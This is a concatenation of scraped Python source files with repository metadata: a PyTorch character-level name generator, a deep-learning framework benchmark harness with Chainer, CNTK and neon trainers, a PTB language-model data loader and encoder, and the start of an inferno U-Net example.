self.phrase = "Brae"
def eat(self,other):
self.phrase = str(other.phrase)+str(",")
class Sheep(Animal):
def __init__(self):
super().__init__()
self.phrase = "GypJ"
class Donkey(Animal):
def __init__(self):
super().__init__()
self.phrase = "vozx"
def eat(self,other):
self.phrase = str(other.phrase)+str("!")
class Pig(Animal):
def __init__(self):
super().__init__()
self.phrase ="eduj"
if __name__ == "__main__":
print(tell_story()=="Sphinx of black quartz, judge my vow!")
``` |
{
"source": "0HenryH/ai2021s",
"score": 3
} |
#### File: ai2021s/AI-lec8-rnn/gen_en.py
```python
import time
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import itertools
import collections
import matplotlib.pyplot as plt
# Read in data
# df = pd.read_csv("Chinese_Names_Corpus_Gender(120W).txt", header=2)
df = pd.read_csv("English_Cn_Name_Corpus(48W).txt", header=None, names=["name"], skiprows=2)
names = df["name"].values
# Compute character frequency
chars = [list(name) for name in names]
chars_flatten = list(itertools.chain(*chars))
freq = collections.Counter(chars_flatten)
freq = pd.DataFrame(freq.items(), columns=["char", "freq"])
freq = freq.sort_values(by="freq", ascending=False)
# Power law (?)
char_rank = np.arange(freq.shape[0])
char_freq = freq["freq"].values
plt.plot(char_rank, char_freq)
plt.plot(np.log(1.0 + char_rank), np.log(char_freq))
# Prepare data
dict_size = 50
charset_size = dict_size + 1 # for EOS
dict = list(freq["char"].values[:dict_size])
dict_set = set(dict)
dat = list(filter(lambda name: set(name).issubset(dict_set), names))
# One-hot encoding
def char2index(char):
return dict.index(char)
def name2index(name):
return [char2index(char) for char in name]
def char2tensor(char):
tensor = torch.zeros(1, charset_size)
tensor[0, char2index(char)] = 1
return tensor
def name2tensor(name):
tensor = torch.zeros(len(name), 1, charset_size)
for i, char in enumerate(name):
tensor[i, 0, char2index(char)] = 1
return tensor
def names2tensor(names):
n = len(names)
lens = [len(name) for name in names]
max_len = np.max(lens)
tensor = torch.zeros(max_len, n, charset_size)
target = torch.zeros(max_len, n, dtype=int) + charset_size - 1
for i in range(n):
name = names[i] # the i-th name
for j in range(len(name)): # the j-th character in the name
tensor[j, i, char2index(name[j])] = 1
if j < len(name) - 1:
target[j, i] = char2index(name[j + 1])
return tensor, np.array(lens), target
char2index("斯")
name2index("斯基")
char2tensor("斯")
name2tensor("斯基")
names2tensor(["斯基", "斯诺夫"])
# Build model
class RNN(nn.Module):
def __init__(self, input_size, hidden_size):
super(RNN, self).__init__()
self.hidden_size = hidden_size
self.i2h = nn.Linear(input_size + hidden_size, hidden_size)
self.i2o = nn.Linear(input_size + hidden_size, input_size)
self.o2o = nn.Linear(hidden_size + input_size, input_size)
self.dropout = nn.Dropout(0.1)
self.logsoftmax = nn.LogSoftmax(dim=1)
def forward(self, input, hidden):
input_combined = torch.cat((input, hidden), 1)
hidden = torch.relu(self.i2h(input_combined))
output = torch.relu(self.i2o(input_combined))
output_combined = torch.cat((hidden, output), 1)
output = self.o2o(output_combined)
output = self.dropout(output)
output = self.logsoftmax(output)
return output, hidden
def init_hidden(self, batch_size):
return torch.zeros(batch_size, self.hidden_size)
n_hidden = 64
rnn = RNN(charset_size, n_hidden)
input = name2tensor("斯基")
hidden = rnn.init_hidden(batch_size=1)
output, next_hidden = rnn(input[0], hidden)
np.random.seed(123)
torch.random.manual_seed(123)
device = torch.device("cuda")
# device = torch.device("cpu") # If no GPU on the machine
# train_id = np.random.choice(len(dat), 10000)
# train = [dat[i] for i in train_id]
train = dat
n = len(train)
n_hidden = 256
nepoch = 100
bs = 256
rnn = RNN(charset_size, n_hidden)
rnn = rnn.to(device=device)
opt = torch.optim.Adam(rnn.parameters(), lr=0.001)
train_ind = np.arange(n)
lossfn = nn.NLLLoss(reduction="none")
losses = []
t1 = time.time()
for k in range(nepoch):
np.random.shuffle(train_ind)
# Update on mini-batches
for j in range(0, n, bs):
# Create mini-batch
ind = train_ind[j:(j + bs)]
mb = [train[i] for i in ind]
mb_size = len(mb)
input, actual_len, target = names2tensor(mb)
input = input.to(device=device)
target = target.to(device=device)
max_len = input.shape[0]
hidden = rnn.init_hidden(mb_size).to(device=device)
loss = 0.0
for s in range(max_len):
output, hidden = rnn(input[s], hidden)
loss_s = lossfn(output, target[s])
valid = torch.tensor((s < actual_len).astype(int)).to(device=device)
loss = loss + loss_s * valid
loss = torch.mean(loss / torch.tensor(actual_len).to(device=device))
opt.zero_grad()
loss.backward()
opt.step()
losses.append(loss.item())
if j // bs % 10 == 0:
print(f"epoch {k}, batch {j // bs}, loss = {loss.item()}")
t2 = time.time()
print(t2 - t1)
plt.plot(losses)
# torch.save(rnn.state_dict(), "gen_en.pt")
# rnn.load_state_dict(torch.load("gen_en.pt"))
# rnn.eval()
family_names = np.unique([name[0] for name in dat])
def random_family_name():
return np.random.choice(family_names, 1)[0]
def random_name(max_len=4):
rnn.eval()
family_name = random_family_name()
input = char2tensor(family_name).to(device=device)
char_ind = [torch.argmax(input).item()]
hidden = rnn.init_hidden(batch_size=1).to(device=device)
for i in range(max_len - 1):
output, hidden = rnn(input, hidden)
ind = torch.argmax(output).item()
if ind == charset_size - 1:
break
char_ind.append(ind)
input.zero_()
input[0, ind] = 1.0
return char_ind
np.random.seed(123)
torch.random.manual_seed(123)
ind = random_name(10)
print("".join([dict[i] for i in ind]))
np.random.seed(123)
torch.random.manual_seed(123)
names = []
for i in range(50):
ind = random_name(10)
names.append("".join([dict[i] for i in ind]))
np.set_printoptions(linewidth=50)
print(np.array(names))
``` |
{
"source": "0h-n0/DL_benchmarks",
"score": 2
} |
#### File: DL_benchmarks/benchmark/main.py
```python
import json
from pathlib import Path
from importlib import import_module
import numpy as np
from tqdm import tqdm
from sacred import Experiment
from sacred.observers import FileStorageObserver
import torchvision.datasets
from benchmark.data import Iterator
ex = Experiment('benchmark')
project_root = Path(__file__).resolve().parent.parent
data_dir = project_root / 'results'
ex.observers.append(FileStorageObserver.create(str(data_dir)))
@ex.config
def config():
"""
"""
project_root = str(project_root)
ngpu = 1 # ngpu = 0 corresponds to cpu-mode
data_type = 'image' # You can choise data-type from this list ['image', 'sequence', 'mnist', 'cifer-10']. 'image' and 'sequence' are dummy data.
assert data_type in ['image', 'sequence', 'mnist', 'cifer-10'], \
"Your data_type[{}] is not supported.".format(data_type)
batch_size = 128
image_shape = (3, 28, 28)
progressbar = True
framework = 'torch'
dnn_arch = 'CNN'
opt_type = 'SGD'
opt_conf = dict(
lr = 0.01,
momentum = 0.9
)
trainer_options = dict(
mode='train',
benchmark_mode=True,
half=False,
parallel_loss=True,
)
time_options = 'total'
assert time_options in ['total', 'forward', 'backward'], \
"Your time_options[{}] is not supported.\n".format(dnn_arch)
assert dnn_arch.lower() in ['cnn', 'dnn', 'rnn', 'lstm', 'capsnet'
'blstm', 'gru', 'alexnet', 'resnet', 'vgg16'], \
"Your dnn_arch[{}] is not supported.\n".format(dnn_arch)
if dnn_arch.lower() in ['resnet']:
batch_size = 92
image_shape = (3, 200, 200)
data_options = dict(
image_shape = image_shape, # (channel, witdth, height)
sequence_shape = 28, # feature
niteration = 1000,
batch_size = batch_size,
label_size = 3000,
target_type = None,
random_generation = False, # If this flag is False, iterator returns same array in all iterations.
)
rnn_layers = 4
framework_version = None
assert framework in ['torch', 'mxnet', 'chainer', 'caffe2',
'cntk', 'tensorflow', 'dynet', 'nnabla', 'neon'], \
"Your framework[{}] is not supported.\n".format(framework)
@ex.capture
def get_iterator(framework, data_type, data_options, progressbar):
dtype = data_type.lower()
if dtype == 'mnist':
from torchvision import datasets
# check data.
train_iter = datasets.MNIST('../data', train=True, download=True,
transform=transforms.Compose([
transforms.Normalize((0.1307,), (0.3081,))
]))
test_iter = datasets.MNIST('../data', train=False, download=True,
transform=transforms.Compose([
transforms.Normalize((0.1307,), (0.3081,))
]))
elif dtype == 'image':
if framework == 'tensorflow':
data_options['target_type'] = 'one-hot'
train_iter = Iterator(data_type, **data_options)
test_iter = None
if progressbar:
train_iter = tqdm(train_iter)
if test_iter:
test_iter = tqdm(test_iter)
return train_iter, test_iter
@ex.capture
def get_model(module, data_type, data_options, dnn_arch, rnn_layers, ngpu):
dtype = data_type.lower()
if dtype == 'image':
channel, xdim, ydim = data_options['image_shape']
output_num = data_options['label_size']
gpu_mode = True if ngpu >= 1 else False
if dnn_arch.lower() == 'cnn':
model = module.CNN(channel, xdim, ydim, output_num)
if dnn_arch.lower() == 'resnet':
model = module.ResNet(channel, xdim, ydim, output_num)
elif dtype == 'mnist':
channel, xdim, ydim = 1, 28, 28
output_num = 10
gpu_mode = True if ngpu >= 1 else False
if dnn_arch == 'CNN':
model = module.CNN(channel, xdim, ydim, output_num)
elif dtype == 'cifer-10':
pass
elif dtype == "sequence":
pass
return model
@ex.capture
def _get_trainer(module, model, ngpu, trainer_options, data_options, time_options):
trainer = module.Trainer(model, ngpu, trainer_options, data_options, time_options)
return trainer
@ex.capture
def get_trainer(_config, framework, framework_version, ngpu):
model = None
if framework == 'torch':
module = import_module('benchmark.models.th')
model = get_model(module=module)
trainer = _get_trainer(module=module, model=model)
elif framework == 'mxnet':
module = import_module('benchmark.models.mx')
model = get_model(module=module)
trainer = _get_trainer(module=module, model=model)
elif framework == 'chainer':
module = import_module('benchmark.models.ch')
model = get_model(module=module)
trainer = _get_trainer(module=module, model=model)
elif framework == 'cntk':
module = import_module('benchmark.models.ct')
model = get_model(module=module)
trainer = _get_trainer(module=module, model=model)
elif framework == 'tensorflow':
module = import_module('benchmark.models.tf')
model = get_model(module=module)
trainer = _get_trainer(module=module, model=model)
elif framework == 'neon':
module = import_module('benchmark.models.ne')
model = get_model(module=module)
trainer = _get_trainer(module=module, model=model)
else:
raise ValueError
return trainer
@ex.capture
def train(trainer, train_iter, test_iter, opt_type, opt_conf):
np.random.seed(1)
trainer.set_optimizer(opt_type, opt_conf)
results = trainer.run(train_iter, test_iter)
dump_results(results=results)
@ex.command
def setup():
pass
@ex.capture
def dump_config(_config, _run):
exp_dir = data_dir / str(_run._id)
config_file = exp_dir / "config.json"
with config_file.open('w') as fp:
json.dump(_config, fp, indent=4)
@ex.capture
def dump_results(_config, _run, results):
exp_dir = data_dir / str(_run._id)
config_file = exp_dir / "results.json"
with config_file.open('w') as fp:
json.dump(results, fp, indent=4)
@ex.automain
def main(_run, _config, project_root, framework):
train_iter, test_iter = get_iterator()
trainer = get_trainer()
train(trainer=trainer, train_iter=train_iter, test_iter=test_iter)
dump_config()
```
#### File: benchmark/models/ch.py
```python
import time
import copy
import torch
import numpy as np
from tqdm import tqdm
import chainer
from chainer import Chain
import chainer.links as L
import chainer.functions as F
from chainer.function_hooks import TimerHook
from benchmark.models.base_trainer import BaseTrainer
class Trainer(BaseTrainer):
def __init__(self, model, ngpu, options,
data_options=None, time_options=None):
self.ngpu = ngpu
self.gpu_mode = True if ngpu >= 1 else False
self.time_options = time_options
if self.gpu_mode:
self.model = [copy.deepcopy(model).to_gpu(i) for i in range(ngpu)]
else:
self.model = model
if options['benchmark_mode']:
chainer.using_config('autotune', True)
def set_optimizer(self, opt_type, opt_conf):
if opt_type == 'SGD':
self.optimizer = chainer.optimizers.SGD(lr=opt_conf['lr'])
self.optimizer.setup(self.model[0])
elif opt_type == 'MomentumSGD':
self.optimizer = chainer.optimizers.MomentumSGD(lr=opt_conf['lr'],
momentum=opt_conf['momentum'])
self.optimizer.setup(self.model[0])
elif opt_type == 'Adam':
self.optimizer = chainer.optimizers.Adam(lr=opt_conf['lr'])
self.optimizer.setup(self.model[0])
else:
raise NotImplementedError
self.optimizer.use_cleargrads()
def run(self, iterator, mode='train'):
report = dict()
time_series = []
start_event = torch.cuda.Event(enable_timing=True)
end_event = torch.cuda.Event(enable_timing=True)
total_s = time.perf_counter()
for idx, (x, t) in enumerate(iterator):
if self.time_options == 'total':
start_event.record()
if self.gpu_mode:
x = x.astype(np.float32)
t = t.astype(np.int32)
minibatch = len(x) // self.ngpu
x = [chainer.Variable(
chainer.cuda.to_gpu(x[j*minibatch:(j+1)*minibatch], j))
for j in range(self.ngpu)]
t = [chainer.Variable(
chainer.cuda.to_gpu(t[j*minibatch:(j+1)*minibatch], j))
for j in range(self.ngpu)]
else:
x = chainer.Variable(x.astype(np.float32))
t = chainer.Variable(t.astype(np.int64))
if self.time_options == 'forward':
with self._record(start_event, end_event):
o = [_model(_x) for _model, _x in zip(self.model, x)]
else:
o = [_model(_x) for _model, _x in zip(self.model, x)]
loss = [F.softmax_cross_entropy(_o, _t) for _o, _t in zip(o, t)]
self.optimizer.target.cleargrads()
[_model.cleargrads() for _model in self.model]
if self.time_options == 'backward':
with self._record(start_event, end_event):
[(_loss / self.ngpu).backward()
for _model, _loss in zip(self.model, loss)]
else:
[(_loss / self.ngpu).backward()
for _model, _loss in zip(self.model, loss)]
[self.model[0].addgrads(_model) for _model in self.model]
self.optimizer.update()
[_model.copyparams(self.model[0]) for _model in self.model]
if self.time_options == 'total':
end_event.record()
torch.cuda.synchronize()
self._elapsed_time = start_event.elapsed_time(end_event)/1000
if isinstance(iterator, tqdm):
iterator.set_description('{:>10s} :{:10.7f}s/it'.format(self.time_options,
self._elapsed_time))
time_series.append(self._elapsed_time)
torch.cuda.synchronize()
total_e = time.perf_counter()
report = dict(
time_series=time_series,
total=total_e - total_s,
)
return report
class Convblock(Chain):
def __init__(self, in_ch, out_ch, kernel, stride=1, pooling=False):
self.pooling = pooling
super(Convblock, self).__init__()
with self.init_scope():
self.conv = L.Convolution2D(in_ch, out_ch, kernel, stride=stride)
def __call__(self, x):
if self.pooling:
return F.max_pooling_2d(F.relu(self.conv(x)), (1, 2), stride=2)
else:
return F.relu(self.conv(x))
class CNN(Chain):
def __init__(self, channel, xdim, ydim, output_num):
super(CNN, self).__init__()
with self.init_scope():
self.conv1 = Convblock(channel, 180, (xdim, 3), 1)
self.conv2 = Convblock(180, 180, (1, 3), stride=1, pooling=True)
self.conv3 = Convblock(180, 180, (1, 3), stride=1)
self.conv4 = Convblock(180, 180, (1, 3), stride=1, pooling=True)
self.conv5 = Convblock(180, 180, (1, 2), stride=1)
self.conv6 = Convblock(180, 180, (1, 1), stride=1)
self.l1 = L.Linear(540, 2048)
self.l2 = L.Linear(2048, 2048)
self.l3 = L.Linear(2048, output_num)
def __call__(self, x):
h = self.conv1(x)
h = self.conv2(h)
h = self.conv3(h)
h = self.conv4(h)
h = self.conv5(h)
h = self.conv6(h)
h = self.l1(h)
h = self.l2(h)
h = self.l3(h)
return h
```
#### File: benchmark/models/ct.py
```python
import os
import numpy as np
import cntk as C
from cntk.device import try_set_default_device, gpu, all_devices
from ctmodel import cnn
from cntk.io import MinibatchSource, CTFDeserializer, StreamDef, StreamDefs, INFINITELY_REPEAT
from cntk.initializer import he_normal
from cntk.layers import AveragePooling, BatchNormalization, Convolution, Dense
from cntk.ops import element_times, relu
class Trainer(object):
def __init__(self, model, ngpu, options=None):
self.model = model
self.ngpu = ngpu
self.gpu_mode = True if ngpu >= 1 else False
if self.gpu_mode:
gpus = [i for i in range(self.ngpu)]
self.is_parallel = False
if options:
self.progressbar = options['progressbar']
def set_optimizer(self, opt_type, opt_conf):
if opt_type == 'SGD':
self.lr_schedule = C.learning_rate_schedule(
opt_conf['lr'], C.UnitType.minibatch)
self.m_schedule = C.momentum_schedule(
opt_conf['momentum'], C.UnitType.minibatch)
else:
raise NotImplementedError
def run(self, iterator, mode='train'):
report = dict()
input_var = C.ops.input_variable(np.prod(iterator.iamge_shape),
np.float32)
label_var = C.ops.input_variable(iterator.batch_size, np.float32)
model = self.model(input_var,)
ce = C.losses.cross_entropy_with_softmax(model, label_var)
pe = C.metrics.classification_error(model, label_var)
z = cnn(input_var)
learner = C.learners.momentum_sgd(z.parameters, self.lr_schedule, self.m_schedule)
if self.is_parallel:
distributed_learner = \
C.data_parallel_distributed_learner(learner=learner,
distributed_after=0)
progress_printer = \
C.logging.ProgressPrinter(tag='Training',
num_epochs=iterator.niteration)
if self.is_parallel:
trainer = C.Trainer(z, (ce, pe), distributed_learner,
progress_printer)
else:
trainer = C.Trainer(z, (ce, pe), learner, progress_printer)
for idx, (x, t) in enumerate(iterator):
total_s = time.perf_counter()
trainer.train_minibatch({input_var : x, label_var : t})
forward_s = time.perf_counter()
forward_e = time.perf_counter()
backward_s = time.perf_counter()
backward_e = time.perf_counter()
total_e = time.perf_counter()
report[idx] = dict(
forward=forward_e - forward_s,
backward=backward_e - backward_s,
total=total_e - total_s
)
return report
class CNN(object):
def __init__(self, channel, xdim, ydim, output_num):
self.cnn = partial(cnn,
channel=channel,
xdim=xdim,
ydim=ydim,
output_num=output_num)
def get_func(self):
return self.cnn
def __call__(self, x):
return self.cnn(x)
def cnn(x, channel, xdim, ydim, output_num):
net = C.layers.Convolution2D((xdim, 3), 180, activation=C.ops.relu, pad=False, strides=1)(x)
net = C.layers.Convolution2D((1, 3), 180, activation=C.ops.relu, pad=False)(net)
net = C.layers.MaxPooling((1, 2), strides=2)(net)
net = C.layers.Convolution2D((1, 3), 180, activation=C.ops.relu, pad=False)(net)
net = C.layers.Convolution2D((1, 3), 180, activation=C.ops.relu, pad=False)(net)
net = C.layers.MaxPooling((1, 2), strides=2)(net)
net = C.layers.Convolution2D((1, 2), 180, activation=C.ops.relu, pad=False)(net)
net = C.layers.Convolution2D((1, 1), 180, activation=C.ops.relu, pad=False)(net)
net = C.layers.Dense(2048)(net)
net = C.layers.Dense(2048)(net)
net = C.layers.Dense(output_num, activation=None)(net)
return net
```
#### File: benchmark/models/nn.py
```python
import os
import time
from functools import partial
#https://neon.nervanasys.com/index.html/models.html
import neon as nn
class Trainer(object):
def __init__(self, model, ngpu, options=None):
self.model = model
self.ngpu = ngpu
self.gpu_mode = True if ngpu >= 1 else False
if self.gpu_mode:
self.gpus = [mx.gpu(i) for i in range(ngpu)]
if options['benchmark_mode']:
os.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = '1'
self.progressbar = options['progressbar']
def set_optimizer(self, opt_type, opt_conf):
if opt_type == 'SGD':
self.opt_type = 'sgd'
self.lr = opt_conf['lr']
self.metric = mx.metric.CrossEntropy()
else:
raise NotImplementedError
def run(self, iterator, mode='train'):
report = dict()
# setup mxnet module
data = mx.sym.var('data')
module = mx.mod.Module(symbol=self.model(data),
context=self.gpus,
data_names=['data'],
label_names=['softmax_label'])
B = iterator.batch_size
C, H, W = iterator.image_shape
data_shape = (B, C, H, W)
label_shape = (B,)
# https://mxnet.incubator.apache.org/tutorials/basic/data.html
module.bind(data_shapes=zip(['data'], [data_shape]),
label_shapes=zip(['softmax_label'], [label_shape]))
module.init_params(initializer=mx.init.Xavier(magnitude=2.))
module.init_optimizer(optimizer=self.opt_type,
optimizer_params=(('learning_rate', self.lr),))
self.metric.reset()
## end setup
if self.progressbar:
iterator = tqdm(iterator)
for idx, (x, t) in enumerate(iterator):
total_s = time.perf_counter()
x = [mx.nd.array(x[i, ...].reshape(1, C, H, W)) for i in range(B)]
t = [mx.nd.array([t[i]]) for i in range(B)]
batch = mx.io.DataBatch(x, t)
forward_s = time.perf_counter()
module.forward(batch, is_train=True)
forward_e = time.perf_counter()
module.update_metric(self.metric, batch.label)
backward_s = time.perf_counter()
module.backward()
backward_e = time.perf_counter()
module.update()
total_e = time.perf_counter()
report[idx] = dict(
forward=forward_e - forward_s,
backward=backward_e - backward_s,
total=total_e - total_s
)
return report
class CNN(object):
def __init__(self, channel, xdim, ydim, output_num):
self.cnn = partial(cnn,
channel=channel,
xdim=xdim,
ydim=ydim,
output_num=output_num)
def get_func(self):
return self.cnn
def __call__(self, x):
return self.cnn(x)
def cnn(x, channel, xdim, ydim, output_num):
net = mx.sym.Convolution(data=x, kernel=(xdim, 3), num_filter=180)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.Convolution(data=net, kernel=(1, 3), num_filter=180)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.Pooling(data=net, pool_type='max', kernel=(1, 2), stride=(2, 2))
net = mx.sym.Convolution(data=net, kernel=(1, 3), num_filter=180)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.Convolution(data=net, kernel=(1, 3), num_filter=180)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.Pooling(data=net, pool_type='max', kernel=(1, 2), stride=(2, 2))
net = mx.sym.Convolution(data=net, kernel=(1, 2), num_filter=180)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.Convolution(data=net, kernel=(1, 1), num_filter=180)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.flatten(data=net)
net = mx.sym.FullyConnected(data=net, num_hidden=2048)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.FullyConnected(data=net, num_hidden=2048)
net = mx.sym.Activation(data=net, act_type='relu')
net = mx.sym.FullyConnected(data=net, num_hidden=output_num)
net = mx.sym.SoftmaxOutput(data=net, name='softmax')
#a = mx.viz.plot_network(net)
#a.render('cnn.net')
return net
``` |
{
"source": "0h-n0/first_deep",
"score": 2
} |
#### File: first_deep/libs/data.py
```python
import math
from pathlib import Path
import torch.utils.data
from torch.utils.data import Dataset
from torch.utils.data.sampler import Sampler
from .reserved_tokens import UNKNOWN_TOKEN
from .reserved_tokens import EOS_TOKEN
from .encoders import IdentityEncoder
class BPTTSampler(Sampler):
def __init__(self, data, bptt_length, type_='source'):
self.data = data
self.bptt_length = bptt_length
self.type = type_
def __iter__(self):
for i in range(0, len(self.data) - 1, self.bptt_length):
seq_length = min(self.bptt_length, len(self.data) - 1 - i)
if self.type == 'source':
yield slice(i, i + seq_length)
if self.type == 'target':
yield slice(i + 1, i + 1 + seq_length)
def __len__(self):
return math.ceil((len(self.data) - 1) / self.bptt_length)
class BPTTBatchSampler(object):
def __init__(self, data, bptt_length, batch_size, drop_last, type_='source'):
self.data = data
self.batch_size = batch_size
self.drop_last = drop_last
chunk_sizes = [math.floor(len(data) / batch_size)] * batch_size
# Distribute the remaining elements to some chunks
if not self.drop_last:
remainder = len(data) - sum(chunk_sizes)
for i in range(remainder):
chunk_sizes[i] += 1
self.samplers = [{
'offset': sum(chunk_sizes[:i]),
'sampler': BPTTSampler(range(chunk_sizes[i]), bptt_length, type_=type_)
} for i in range(batch_size)]
def __iter__(self):
self.iterators = [iter(value['sampler']) for value in self.samplers]
while True:
batch = []
for i, iterator in enumerate(self.iterators):
try:
# Adjust the sampler indices to the offset
offset = self.samplers[i]['offset']
slice_ = next(iterator)
batch.append(slice(slice_.start + offset, slice_.stop + offset))
except StopIteration:
pass
# Samplers are all empty
if (len(batch) == 0):
break
yield batch
def __len__(self):
return len(self.samplers[0]['sampler'])
class DummyDataset(Dataset):
def __init__(self, data_source, source_sampler, target_sampler):
self.data_source = data_source
self.source_sampler = list(source_sampler)
self.target_sampler = list(target_sampler)
self.size = len(self.source_sampler)
def __getitem__(self, idx):
data = torch.stack([self.data_source[i] for i in self.source_sampler[idx]])
targets = torch.stack([self.data_source[i] for i in self.target_sampler[idx]]).view(-1)
return data, targets
def __len__(self):
return self.size
class PTBDataloaderFactory(object):
train_data_path = ''
train_test_path = ''
train_valid_path = ''
@classmethod
def set_train_data_path(cls, path):
cls.train_data_path = path
@classmethod
def set_test_data_path(cls, path):
cls.test_data_path = path
@classmethod
def set_valid_data_path(cls, path):
cls.valid_data_path = path
def __init__(self, batch_size=128, test_batch_size=1024, bptt_length=10, num_workers=3, shuffle=True):
self.batch_size = batch_size
self.test_batch_size = test_batch_size
self.bptt_length = bptt_length
self.num_workers = num_workers
self.shuffle = shuffle
self.raw_data = dict(
train=self._preprocess(self.train_data_path),
valid=self._preprocess(self.valid_data_path),
test=self._preprocess(self.test_data_path))
self.encoder = IdentityEncoder(self.raw_data['train'] +
self.raw_data['valid'] +
self.raw_data['test'])
self.ntokens = self.encoder.vocab_size
self.data = dict(
train=self.encoder.encode(self.raw_data['train']),
valid=self.encoder.encode(self.raw_data['valid']),
test=self.encoder.encode(self.raw_data['test']))
def get_dataloader(self, mode='train'):
source_sampler = self._sampler(self.data[mode], self.bptt_length, self.batch_size, 'source')
target_sampler = self._sampler(self.data[mode], self.bptt_length, self.batch_size, 'target')
dataset = DummyDataset(self.data[mode], source_sampler, target_sampler)
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=1,
shuffle=self.shuffle,
num_workers=self.num_workers)
return dataloader
def _sampler(self, text, bptt_length, batch_size, type_):
return BPTTBatchSampler(text, bptt_length, batch_size, True, type_)
def _preprocess(self, path):
full_path = Path(path).expanduser().resolve()
text = []
with full_path.open(encoding='utf-8') as f:
for line in f:
text.extend(line.replace('<unk>', UNKNOWN_TOKEN).split())
text.append(EOS_TOKEN)
return text
```
#### File: first_deep/libs/static_encoder.py
```python
from collections import Counter
import torch
from .reserved_tokens import EOS_INDEX
from .reserved_tokens import RESERVED_ITOS
from .reserved_tokens import UNKNOWN_INDEX
def _tokenize(s):
return s.split()
class Encoder(object):
""" Base class for a text encoder.
"""
def __init__(self): # pragma: no cover
raise NotImplementedError
def encode(self, string): # pragma: no cover
""" Returns a :class:`torch.LongTensor` encoding of the `text`. """
raise NotImplementedError
def batch_encode(self, strings, *args, **kwargs):
""" Returns a :class:`list` of :class:`torch.LongTensor` encoding of the `text`. """
return [self.encode(s, *args, **kwargs) for s in strings]
def decode(self, tensor): # pragma: no cover
""" Given a :class:`torch.Tensor`, returns a :class:`str` representing the decoded text.
Note that, depending on the tokenization method, the decoded version is not guaranteed to be
the original text.
"""
raise NotImplementedError
@property
def vocab_size(self):
""" Return the size (:class:`int`) of the vocabulary. """
return len(self.vocab)
@property
def vocab(self): # pragma: no cover
""" Returns the vocabulary (:class:`list`) used to encode text. """
return NotImplementedError
class StaticTokenizerEncoder(Encoder):
""" Encodes the text using a tokenizer.
Args:
sample (list of strings): Sample of data to build dictionary on.
min_occurrences (int, optional): Minimum number of occurrences for a token to be added to
dictionary.
tokenize (callable): :class:``callable`` to tokenize a string.
append_eos (bool, optional): If `True` append EOS token onto the end to the encoded vector.
reserved_tokens (list of str, optional): Tokens added to dictionary; reserving the first
`len(reserved_tokens)` indexes.
Example:
>>> encoder = StaticTokenizerEncoder(["This ain't funny.", "Don't?"],
tokenize=lambda s: s.split())
>>> encoder.encode("This ain't funny.")
5
6
7
[torch.LongTensor of size 3]
>>> encoder.vocab
['<pad>', '<unk>', '</s>', '<s>', '<copy>', 'This', "ain't", 'funny.', "Don't?"]
>>> encoder.decode(encoder.encode("This ain't funny."))
"This ain't funny."
"""
def __init__(self,
sample,
min_occurrences=1,
append_eos=False,
tokenize=_tokenize,
reserved_tokens=RESERVED_ITOS):
if not isinstance(sample, list):
raise TypeError('Sample must be a list of strings.')
self.tokenize = tokenize
self.append_eos = append_eos
self.tokens = Counter()
for text in sample:
self.tokens.update(self.tokenize(text))
self.itos = reserved_tokens.copy()
self.stoi = {token: index for index, token in enumerate(reserved_tokens)}
for token, count in self.tokens.items():
if count >= min_occurrences:
self.itos.append(token)
self.stoi[token] = len(self.itos) - 1
@property
def vocab(self):
return self.itos
def encode(self, text, eos_index=EOS_INDEX, unknown_index=UNKNOWN_INDEX):
text = self.tokenize(text)
vector = [self.stoi.get(token, unknown_index) for token in text]
if self.append_eos:
vector.append(eos_index)
return torch.LongTensor(vector)
def decode(self, tensor):
tokens = [self.itos[index] for index in tensor]
return ' '.join(tokens)
``` |
{
"source": "0h-n0/inferno",
"score": 3
} |
#### File: inferno/examples/plot_cheap_unet.py
```python
import matplotlib.pyplot as plt
import torch
from torch import nn
import numpy
##############################################################################
# determine whether we have a gpu
# and should use cuda
USE_CUDA = torch.cuda.is_available()
##############################################################################
# Dataset
# --------------
# For simplicity we will use a toy dataset where we need to perform
# a binary segmentation task.
from inferno.io.box.binary_blobs import get_binary_blob_loaders
# convert labels from long to float as needed by
# binary cross entropy loss
def label_transform(x):
return torch.from_numpy(x).float()
#label_transform = lambda x : torch.from_numpy(x).float()
train_loader, test_loader, validate_loader = get_binary_blob_loaders(
size=8, # how many images per {train,test,validate}
train_batch_size=2,
length=256, # <= size of the images
gaussian_noise_sigma=1.4, # <= how noise are the images
train_label_transform = label_transform,
validate_label_transform = label_transform
)
image_channels = 1 # <-- number of channels of the image
pred_channels = 1 # <-- number of channels needed for the prediction
if False:
##############################################################################
# Visualize Dataset
# ~~~~~~~~~~~~~~~~~~~~~~
fig = plt.figure()
for i,(image, target) in enumerate(train_loader):
ax = fig.add_subplot(1, 2, 1)
ax.imshow(image[0,0,...])
ax.set_title('raw data')
ax = fig.add_subplot(1, 2, 2)
ax.imshow(target[0,...])
ax.set_title('ground truth')
break
fig.tight_layout()
plt.show()
##############################################################################
# Training
# ----------------------------
# To train the unet, we use the infernos Trainer class of inferno.
# Since we train many models later on in this example we encapsulate
# the training in a function (see :ref:`sphx_glr_auto_examples_trainer.py` for
# an example dedicated to the trainer itself).
from inferno.trainers import Trainer
from inferno.utils.python_utils import ensure_dir
def train_model(model, loaders, **kwargs):
trainer = Trainer(model)
trainer.build_criterion('BCEWithLogitsLoss')
trainer.build_optimizer('Adam', lr=kwargs.get('lr', 0.0001))
#trainer.validate_every((kwargs.get('validate_every', 10), 'epochs'))
#trainer.save_every((kwargs.get('save_every', 10), 'epochs'))
#trainer.save_to_directory(ensure_dir(kwargs.get('save_dir', 'save_dor')))
trainer.set_max_num_epochs(kwargs.get('max_num_epochs', 20))
# bind the loaders
trainer.bind_loader('train', loaders[0])
trainer.bind_loader('validate', loaders[1])
if USE_CUDA:
trainer.cuda()
# do the training
trainer.fit()
return trainer
##############################################################################
# Prediction
# ----------------------------
# The trainer contains the trained model and we can do predictions.
# We use :code:`unwrap` to convert the results to numpy arrays.
# Since we want to do many prediction we encapsulate the
# the prediction in a function
from inferno.utils.torch_utils import unwrap
def predict(trainer, test_loader, save_dir=None):
trainer.eval_mode()
